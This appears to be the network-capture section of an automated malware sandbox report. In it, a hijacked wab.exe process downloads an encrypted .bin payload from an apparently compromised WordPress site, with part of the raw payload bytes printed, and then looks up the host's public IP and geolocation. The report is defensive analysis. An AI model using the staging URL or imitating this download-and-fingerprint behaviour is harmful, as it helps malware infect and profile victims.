                                              4192.168.2.849720193.122.6.168801372C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 25, 2024 10:06:12.857552052 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 25, 2024 10:06:13.794564962 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:13 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: a06baee768e743f5938963a929faed96
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.849722193.122.6.168801372C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 25, 2024 10:06:14.401153088 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 25, 2024 10:06:17.073066950 CEST730INHTTP/1.1 502 Bad Gateway
                                              Date: Thu, 25 Jul 2024 08:06:16 GMT
                                              Content-Type: text/html
                                              Content-Length: 547
                                              Connection: keep-alive
                                              X-Request-ID: b98c18767f52e37cfea8e0893dc2d0b8
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                              Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.849723193.122.6.168801372C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 25, 2024 10:06:17.104306936 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 25, 2024 10:06:19.733266115 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 7f463481024e7485b25aabfafcffa416
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.849725193.122.6.168801372C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 25, 2024 10:06:20.353204012 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 25, 2024 10:06:23.382668972 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: b0274fd9894dcd08f3a40c2bcd63b092
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.849710108.167.181.2514431372C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-25 08:05:55 UTC202OUTGET /wp-includes/yPrtLahZfwrl128.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: www.reap.skyestates.com.mt
                                              Cache-Control: no-cache
                                              2024-07-25 08:05:56 UTC249INHTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:05:56 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Last-Modified: Tue, 23 Jul 2024 06:10:07 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 277056
                                              Content-Type: application/octet-stream
                                              2024-07-25 08:05:56 UTC7943INData Raw: 7a cb bf eb 56 b4 5f 14 b2 a4 a7 d2 ca 8e 56 3c 37 e0 c8 ec 6a 3e 57 a5 43 1a ad dd 08 43 ad 47 b2 ad e1 0e 27 e5 81 68 57 3d 11 e6 d8 d8 c5 bd 29 e4 15 12 10 77 b5 26 2e 64 16 40 96 e4 28 37 b9 49 f0 10 18 33 5f f8 0a 07 ce c3 2a 18 36 ca 0f 59 e7 26 b7 92 e6 fc 40 0c 35 f4 19 1e ad 73 28 17 de 96 a6 22 ff e0 00 2a 7c 89 23 0a ca 70 e1 93 a3 a1 05 b5 2e a6 4d ff d7 d7 74 85 3d fa 91 45 9c 18 e1 35 6b 37 90 3d bc cc 89 56 73 0f 6f 7b 65 be a3 6c b2 be 8c 77 62 5b 23 01 53 40 d2 dc 40 ed c6 e8 8f 22 89 58 27 16 0b a2 de c3 37 4e b4 16 78 14 6e a4 ab eb 1f f5 fe 98 ee c8 17 d3 96 de 67 4e ad f9 c1 e0 1c cd df c4 c4 48 7e 0d 1c 66 8c 68 c0 a7 94 a7 5d a2 7e 9c 7e 46 e1 88 b3 e0 29 14 69 8d d9 1f ca 6a 99 00 da 2f 14 2d 2f ac b4 80 36 51 79 d1 75 57 df ec 30
                                              Data Ascii: zV_V<7j>WCCG'hW=)w&.d@(7I3_*6Y&@5s("*|#p.Mt=E5k7=Vso{elwb[#S@@"X'7NxngNH~fh]~~F)ij/-/6QyuW0
                                              2024-07-25 08:05:56 UTC8000INData Raw: 64 53 d5 30 22 15 f8 a0 28 44 3c 7a 93 7b 90 14 60 76 71 f7 43 4b be 89 ae e3 f3 1b 08 6e 63 c2 0a 2e 3c 77 3f 9f 10 90 a8 03 b4 5a 35 68 b0 ba 27 26 37 8e e3 db 2f ee 54 9d 75 d7 04 4b fd 65 a7 69 5d 24 91 06 c7 51 b7 fb 5c 46 1a 1f 8c 61 a7 9a cc c2 8a 18 0a bc d0 76 76 52 ba 25 06 5b 33 d2 d8 a8 2c 88 04 e0 6d 28 6d c7 16 b6 5f 64 84 f7 64 e0 fd 1b cb 84 b5 5a 98 78 3c 1b f6 f4 99 18 f8 4d 7a 52 c3 45 dc 23 8d f2 cc d3 51 a6 d4 3b dc a4 0a 7d a8 8d 51 4e d4 6a a4 8a 2d e0 4f 0e 2b 9d e9 39 d4 f8 5f 60 e8 de e5 ee 1d a0 b4 70 7f 55 9e a5 35 bc f9 db da 8f 37 9e 5e 25 87 60 8e fa 51 03 a0 04 30 db 2c f5 c8 2a d2 51 68 30 3c b3 06 3e 24 e6 ed d8 d3 1d b3 31 4e 08 70 05 f5 e3 ae c8 17 1b 3c ee 60 58 14 d6 31 29 de d5 29 30 05 e1 16 ed b3 27 76 91 ea b9 d9
                                              Data Ascii: dS0"(D<z{`vqCKnc.<w?Z5h'&7/TuKei]$Q\FavvR%[3,m(m_ddZx<MzRE#Q;}QNj-O+9_`pU57^%`Q0,*Qh0<>$1Np<`X1))0'v
                                              2024-07-25 08:05:56 UTC8000INData Raw: 7d ee d5 ca ae d2 aa bc f4 5f fd f1 61 92 10 6e c3 9e 91 8a 23 85 73 85 59 c5 c2 51 64 6b fc 8e a9 3e 77 86 b7 36 fb b7 20 0f af 17 b4 d5 b4 f4 6e 8a 17 19 73 15 27 56 ce 5b 91 66 70 11 8a de fc ff d2 5d c0 f2 f1 3e f3 ba 68 c7 95 7a 2b 24 3b 23 80 4d 0b 01 f8 55 2b a3 65 21 69 bf 1a 96 c4 e5 ea 3e 7a 3e de d4 4b 63 55 d5 27 2e ba e1 5c 1c cd 9b 8f 05 1d 65 b5 bc a0 a9 9c ee 3f 1c 84 97 80 ff 0c 45 1b d5 1c 95 21 f4 ac 8f 62 3e ec e0 d3 35 45 5b f9 24 9a 03 98 c1 2f c4 fd f0 70 ad 5c 94 7d 28 40 0e f5 1b be 6e 1d 1d cc e5 13 b4 9d d0 42 7a 31 0f 94 8a 84 d7 26 13 ac 16 82 97 1d 4f d1 43 ca fb 65 b0 ba 26 e3 a7 07 07 9a a6 98 63 66 96 e7 37 a0 56 40 d4 2a 0b 01 e0 e6 89 c7 9c 88 23 c2 d6 50 c3 a7 c1 ae 1e 57 39 94 7f 82 13 e9 ca 6a 7c ee b9 6b 6c 3e 3d 95
                                              Data Ascii: }_an#sYQdk>w6 ns'V[fp]>hz+$;#MU+e!i>z>KcU'.\e?E!b>5E[$/p\}(@nBz1&OCe&cf7V@*#PW9j|kl>=
                                              2024-07-25 08:05:56 UTC8000INData Raw: 31 6c bf 03 80 4a 8b bf b2 1b e8 2a 25 3e f8 29 04 ee 06 82 07 a8 39 39 24 32 9d 17 ea 63 7b fd b8 2f 2c 85 2c 45 56 6b b0 4f 21 05 47 2b 67 3a 69 2e 8b a1 38 f5 4c 78 e9 95 68 d5 d7 c2 85 97 10 1d c8 c5 af 90 3e 82 d1 fb 5f a7 0a 0e 76 a2 4a b3 a9 83 6f f4 27 a9 1d 5a 76 f4 a8 ef f5 00 03 b7 0e f4 8c 22 52 e3 5e 98 cd c6 4e 3c 51 79 7a 42 b2 18 91 56 30 8d fe ba 89 09 b7 39 6e a6 9f 2d 42 b5 53 1a fd 8f 78 6f 07 e0 7e 9c 01 af 62 3c 36 0a e0 5c d8 0a d4 7c 9a 0c 2b 5d 2f e7 dc a7 3e 51 34 d1 c4 ab 04 07 74 3b 3c ef 7f 4e 22 20 3c 3a 79 c5 e7 57 83 69 c8 0f a4 b9 ed df 9f 19 92 6b de bc a9 3c 9e 48 5a 3c 8b 09 22 b2 1b 9b a7 23 bc 0d f3 1c d3 ec 46 34 9a ec d5 94 d5 e8 7d 66 1d 11 c4 01 c4 91 b2 1c 72 a4 9c 7d 5b de bf 97 cf 54 59 ed ce 18 13 48 c4 4c 3c
                                              Data Ascii: 1lJ*%>)99$2c{/,,EVkO!G+g:i.8Lxh>_vJo'Zv"R^N<QyzBV09n-BSxo~b<6\|+]/>Q4t;<N" <:yWik<HZ<"#F4}fr}[TYHL<
                                              2024-07-25 08:05:56 UTC8000INData Raw: 0e 00 a1 7c d5 e7 3c c7 be 51 f1 2e 39 fb 89 a2 00 0c 3f f4 10 71 07 73 28 1d de 48 aa 22 f6 cc 07 23 13 88 23 0a c0 70 3d 4d b0 84 2d 81 2e a6 47 ec d3 d7 dc e7 3d fa 95 87 77 10 e1 81 62 fa b1 fb 8f 80 44 73 55 30 04 08 35 d8 f9 82 d5 cc e7 0c bc 39 51 6a 2c 2a 9f 58 20 88 e6 e4 d5 4c a9 35 3b 07 4d ed fd f5 72 a0 d0 73 5c 0f 9d af 9c ed 0e f3 c7 a8 ef c8 47 96 82 20 2d 72 ae f9 1e 16 4c ab df ce ec 89 7e 0d 16 66 1f aa c2 a6 95 b5 0a b3 79 c6 40 46 e1 98 c0 23 29 14 63 e2 03 5c ce 60 99 31 dd 40 d1 4d 2b a6 ca bd 76 51 7d 9e b3 57 df e4 30 21 d7 e6 5c 54 36 19 b1 cf 84 1e 42 66 fb e7 49 e5 96 d4 84 e2 e5 74 cf 6c 63 af 0a 0e a3 6a a5 df 10 90 a9 26 a2 29 3f c7 04 ca 97 46 20 a6 56 c0 1f ee f6 70 6d a5 6c 5a fd 15 14 4c 44 29 04 06 c7 5f 1e ac 22 3a 21
                                              Data Ascii: |<Q.9?qs(H"##p=M-.G=wbDsU059Qj,*X L5;Mrs\G -rL~fy@F#)c\`1@M+vQ}W0!\T6BfItlcj&)?F VpmlZLD)_":!
                                              2024-07-25 08:05:56 UTC8000INData Raw: 12 c5 6c 7f 44 7e 69 de 08 aa e3 c9 d4 cb a6 eb 3b dc a8 69 87 da 79 55 21 5a 05 0b 80 26 c2 46 7c 71 9a 86 b4 c7 fc 5c 60 a7 de e5 ee 02 af b3 67 69 5f f8 38 30 aa f8 af 8e 8b 37 88 46 2d 96 68 e1 48 52 10 ae 06 30 c4 30 c2 b0 88 d6 4f 4c 18 1e a2 1e 17 e0 31 d4 a1 ff 68 b7 35 51 04 72 5f cf 83 ca d9 08 38 0d 91 70 5c 0b fc 1f b5 e4 d1 32 ea 08 e7 10 cc 98 76 6d 86 ff 97 e3 2d de 63 6d 16 34 f3 83 67 39 23 a0 e3 66 4f 2c 90 65 09 c6 d7 77 a3 d2 1e a1 5d 8d c0 0a 13 06 92 8e 26 61 b3 67 47 d8 78 23 c4 d3 6b 55 01 13 fb 13 96 54 5d df a4 c0 70 89 ae ce db 6f fd 81 6b 09 66 6e b0 a3 b1 8a 53 1d a8 e8 59 72 d1 54 75 2c d6 9e ab 2d cf ae 0a 73 fb b1 4e 0e ae 17 be d2 6d a1 6e ae 14 a1 5b 9b 20 56 c8 41 4f 2f 55 7c be de fd e6 f1 58 c0 aa e2 39 e2 ba 44 db 87
                                              Data Ascii: lD~i;iyU!Z&F|q\`gi_807F-hHR00OL1h5Qr_8p\2vm-cm4g9#fO,ew]&agGx#kUT]pokfnSYrTu,-sNmn[ VAO/U|X9D
                                              2024-07-25 08:05:56 UTC8000INData Raw: bf 64 90 b5 43 33 9f 34 36 2b dc b5 a5 0b 38 ff ea c2 39 51 d7 f4 21 97 62 96 82 88 ec 09 f6 58 04 4d 92 18 5c 29 0e ff 0c b2 6c 09 0c fc e1 00 81 9d d0 42 75 24 0f ad 7e fa b5 2c 02 ae 55 d9 e9 7f 45 f9 51 e3 ed 1d c2 bc 26 f8 52 8c 80 9a a6 9f 35 81 e4 69 0e 85 a6 80 f1 3d 06 d0 37 fe fb f8 b1 8e 3c 93 f3 49 d8 a3 49 8b 17 15 7a b3 28 f2 b1 cc ce 7b 79 5d 9c 6a 93 27 1a 95 e0 94 b4 4d f5 ba e4 4a 7c 2a 66 53 f6 e0 eb 2e 96 03 cd e9 8e 1d 7f 36 72 72 11 be 46 24 84 ec 49 aa 90 f0 38 93 d5 75 9a eb d9 6a e0 ea 19 31 31 81 81 66 4f 53 3f 2b 84 38 d8 ac ba 7c 28 11 ac 2f f0 32 15 2e d0 6f ea 46 2b 00 fa 20 b8 3f c3 ee 3b f7 ab 20 09 bb 3c d1 41 61 1e ed 04 38 6f 9f 67 7b 7f 8c ae b9 4a 9d 43 6b 99 37 4d ac a8 fa 85 e4 15 bf ed cf dd ab 3d c7 a1 59 7b a7 44
                                              Data Ascii: dC346+89Q!bXM\)lBu$~,UEQ&R5i=7<IIz({y]j'MJ|*fS.6rrF$I8uj11fOS?+8|(/2.oF+ ?; <Aa8og{JCk7M=Y{D
                                              2024-07-25 08:05:56 UTC8000INData Raw: 2d 03 9c 25 1a 97 84 78 4f 17 ec 7e 9c 6c d8 62 3d 27 3a f5 4f 75 df d4 7c a9 1f 3e 3e 31 e9 c0 ff 52 7d 34 db b2 36 66 16 04 63 64 fa 57 91 28 20 30 01 79 b6 d1 4c 88 1e d9 16 a5 b9 e7 ca fb 23 87 19 af b7 a1 3e c3 b8 5a 4c ee 2f 08 e8 1d bd a5 5d 8d 60 af 1a c4 3c 46 2b 9d e8 af 2e e4 e9 0d 09 c2 00 cc 79 86 a6 a5 7d 05 03 f7 17 32 0b b7 86 cd 26 1c dc a1 b1 7c 61 cc 5f 23 c3 1f 11 b1 c6 f6 bc 85 3a c6 dd 88 7a 8b 76 8a ad b6 28 92 05 62 78 d3 2b fc 98 15 b6 d2 69 89 e7 d4 6f 63 04 37 ea cd 46 42 a9 14 f2 3b 77 11 1b 39 4c f1 1f 01 e6 d1 d7 e7 30 d9 bc 48 ec 0a 8c e0 a7 bb 00 7c 1d 14 19 1e ab 5b 64 17 de 9c 8e 31 fd e0 06 39 70 98 2f 1e 34 73 f2 9e b2 ac 29 a3 06 52 4d ff dd c6 f2 ea 61 fa 9f 50 37 1a c9 95 60 fa b7 96 bb 80 44 77 0c 72 06 20 b1 ce d1
                                              Data Ascii: -%xO~lb=':Ou|>>1R}46fcdW( 0yL#>ZL/]`<F+.y}2&|a_#:zv(bx+ioc7FB;w9L0H|[d19p/4s)RMaP7`Dwr
                                              2024-07-25 08:05:56 UTC8000INData Raw: 6d 9d ac ad 42 8a 48 0e 62 35 64 6c 6e b0 0e d1 a6 7d aa 6f bf 08 ea af 9c c3 8f 00 16 69 8b ef 07 ce 6a 93 33 df 3e 10 65 39 ae b4 86 65 59 68 f9 59 14 d9 c6 2a 31 d0 9e 47 5f 37 69 93 14 98 1f 48 1e 59 e4 4b 95 b8 9c 8d f3 e6 0f f6 6d 70 af 1b 15 b2 89 29 8c 1b 81 a3 2f a2 73 c1 db 04 b0 24 67 58 d2 e2 c0 15 f5 5d 7d 61 d5 04 53 ee 61 b6 69 5d 7c 1c 06 ef af bc 89 32 40 0b 68 d6 6d e9 9a ba 85 e8 1a 0a b0 b3 2d 62 20 16 03 10 29 24 59 c8 ac 2c 80 53 ac 64 8a 38 c2 3b 23 4b 73 03 61 9a e3 ed 3a af c9 28 7f fb 68 03 b2 58 f4 93 04 20 5f 23 55 57 1a 84 09 87 93 df ed 4a 8e ef 31 ca 50 05 25 c9 75 4e 42 88 48 16 07 6d ea 42 7d 54 8a 9b 0c 9f fc 26 ad 7d c9 ec 46 2b bf ed 37 21 52 81 b6 10 a5 e2 ab 07 aa 2d ed 32 62 96 18 43 6d 4a 12 af b5 11 c7 4f 71 80 99
                                              Data Ascii: mBHb5dln}oij3>e9eYhY*1G_7iHYKmp)/s$gX]}aSai]|2@hm-b )$Y,Sd8;#Ksa:(hX _#UWJ1P%uNBHmB}T&}F+7!R-2bCmJOq
                                              2024-07-25 08:05:56 UTC8000INData Raw: 7f 4d 3a 86 a8 22 33 15 d2 de 70 ce 5e b3 4f 1f 48 db 29 4e c8 1b ad 71 c1 b2 87 52 06 98 fd 24 57 c1 21 08 83 08 81 eb ce bf 7f 24 0b 89 4c ab 7f 0d 7d f1 d3 bf f2 0c 99 ee 3d 82 be 61 a7 b2 4b d9 8f 94 28 06 0b 04 06 7e 75 b2 f3 4c 5c fa 8e a3 3d 7a f8 90 73 fb b3 30 02 87 5e b4 d8 b9 74 49 ac 17 1d 73 26 31 51 d9 9d 82 61 61 53 9b d8 c3 55 1c a1 3f ad f1 e0 e3 98 40 f3 84 7a 5f 2a 35 23 ac 51 10 01 f2 8f 44 1a 4f 21 2e b5 32 17 c4 e5 e0 28 97 3d d4 d2 19 48 2b ce b6 2f be 8e f5 1c cd 9d 4a 18 1d 64 aa fe 4f bc 3f 9f 41 07 be 97 84 81 b5 5a 07 fb 26 37 21 fe d4 72 6c 3e 9c ce 9a 35 45 23 fd 32 9c 5b 8d af 9e ce f6 f1 61 63 5d 94 77 06 5a 25 f7 1d b8 48 15 7c da a9 13 f7 f2 f6 40 5e 37 29 8d e5 dd b7 26 15 bf e0 96 ef 69 5c d6 7f df ec 1b d1 b2 37 e0 2b
                                              Data Ascii: M:"3p^OH)NqR$W!$L}=aK(~uL\=zs0^tIs&1QaaSU?@z_*5#QDO!.2(=H+/JdO?AZ&7!rl>5E#2[ac]wZ%H|@^7)&i\7+


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.849712188.114.96.34431372C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-25 08:06:01 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-25 08:06:01 UTC706INHTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:01 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 23484
                                              Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MG9GiZQ34rJjOYBeYh8lrhOFp1oletlSdzAnuFmLt34TGSvyvhNqiboH3Lq%2FeSK3bmp8SKEiuMMDVO%2Bll7aSs11gSC2HLQmBOS19hW0hafcGo%2FfpiNAoDcwOmsApTo6XKfX0iGBn"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a8aa5f21f1e4213-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-25 08:06:01 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-25 08:06:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.849713188.114.96.34431372C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-25 08:06:04 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-07-25 08:06:04 UTC712INHTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:04 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 23487
                                              Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cT1fgqbtDpv1Bmeh5%2F5Ucq1wAjz1jGY6x%2BvVnottmLpLBvPsm4oXKZFYJnvZOQHi%2F19cWBaYVJ9V2%2FLAL%2FVR8QgqlnnHQcNxd%2ByYqCI93NzSXK1CQjdC4b0AnzKijzW3PH4uFbJY"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a8aa606691c1916-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-25 08:06:04 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-25 08:06:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.849715188.114.96.34431372C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-25 08:06:06 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-25 08:06:06 UTC704INHTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:06 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 23489
                                              Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
